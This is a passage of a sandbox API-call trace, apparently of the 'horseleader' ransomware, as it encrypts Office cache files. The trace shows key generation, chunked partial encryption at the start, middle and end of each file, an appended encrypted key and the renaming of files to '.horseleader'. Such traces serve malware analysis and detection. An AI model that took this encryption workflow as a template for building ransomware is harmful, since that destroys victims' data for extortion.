cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0143.885] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0143.885] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 66 [0143.885] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0143.885] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0143.885] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0143.885] GetProcessHeap () returned 0x780000 [0143.885] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0143.885] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 68 [0143.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0143.955] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0143.955] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0143.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0143.956] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0143.956] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0143.956] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0143.956] lstrlenW (lpString=".testttjffg") returned 11 [0143.956] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0143.956] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.956] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.957] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0143.957] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0143.957] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0143.957] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0143.957] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0143.957] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0143.957] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0143.958] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0143.958] lstrlenW (lpString=".testttjffg") returned 11 [0143.958] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0143.958] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.958] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.958] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.958] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0143.959] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Windows") returned -1 [0143.959] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0143.959] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".horseleader") returned 0x0 [0143.959] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0143.959] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="_uninstalling_.png") returned 1 [0143.959] lstrlenW (lpString=".testttjffg") returned 11 [0143.959] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpSrch=".testttjffg") returned 0x0 [0143.959] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.960] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.960] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0143.961] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0143.961] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".txt") returned 0x0 [0143.961] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2513920) returned 1 [0143.961] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.962] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0143.965] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.965] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0143.966] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x130600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.966] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.003] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.003] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.003] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x260c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.004] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.027] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0144.027] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0144.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0144.028] CloseHandle (hObject=0x21c) returned 1 [0144.242] GetProcessHeap () returned 0x780000 [0144.242] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0144.242] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.horseleader") returned 95 [0144.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.horseleader")) returned 1 [0144.243] GetProcessHeap () returned 0x780000 [0144.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0144.243] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0144.243] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Windows") returned -1 [0144.244] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0144.244] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".horseleader") returned 0x0 [0144.244] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0144.244] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="_uninstalling_.png") returned 1 [0144.244] lstrlenW (lpString=".testttjffg") returned 11 [0144.244] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".testttjffg") returned 0x0 [0144.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0144.244] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0144.244] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0144.245] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0144.245] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".txt") returned 0x0 [0144.245] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1450) returned 1 [0144.245] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0144.905] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0144.906] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0144.906] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0144.906] CloseHandle (hObject=0x21c) returned 1 [0144.907] GetProcessHeap () returned 0x780000 [0144.907] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0144.907] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.horseleader") returned 95 [0144.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.horseleader")) returned 1 [0144.909] GetProcessHeap () returned 0x780000 [0144.909] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0144.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0144.909] lstrcmpiW (lpString1="PubLR.cab", lpString2="Windows") returned -1 [0144.909] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0144.909] StrStrIW (lpFirst="PubLR.cab", lpSrch=".horseleader") returned 0x0 [0144.909] lstrcmpW (lpString1="PubLR.cab", lpString2="#Decrypt#.txt") returned 1 [0144.909] lstrcmpW (lpString1="PubLR.cab", lpString2="_uninstalling_.png") returned 1 [0144.909] lstrlenW (lpString=".testttjffg") returned 11 [0144.909] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".testttjffg") returned 0x0 [0144.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0144.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0144.910] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0144.910] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0144.910] StrStrW (lpFirst="PubLR.cab", lpSrch=".txt") returned 0x0 [0144.910] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9958388) returned 1 [0144.910] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.911] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.731] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.731] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4bd1fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.738] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.738] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.739] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x97a3f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.739] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.758] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.758] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0145.758] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0145.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0145.759] CloseHandle (hObject=0x21c) returned 1 [0150.643] GetProcessHeap () returned 0x780000 [0150.643] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0150.643] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.horseleader") returned 88 [0150.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.horseleader")) returned 1 [0150.645] GetProcessHeap () returned 0x780000 [0150.645] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0150.646] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0150.646] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0150.646] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0150.646] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0150.646] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0150.646] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0150.646] lstrlenW (lpString=".testttjffg") returned 11 [0150.646] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0150.646] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.647] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.647] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0150.648] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0150.648] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0150.649] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1608) returned 1 [0150.649] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x648, lpOverlapped=0x0) returned 1 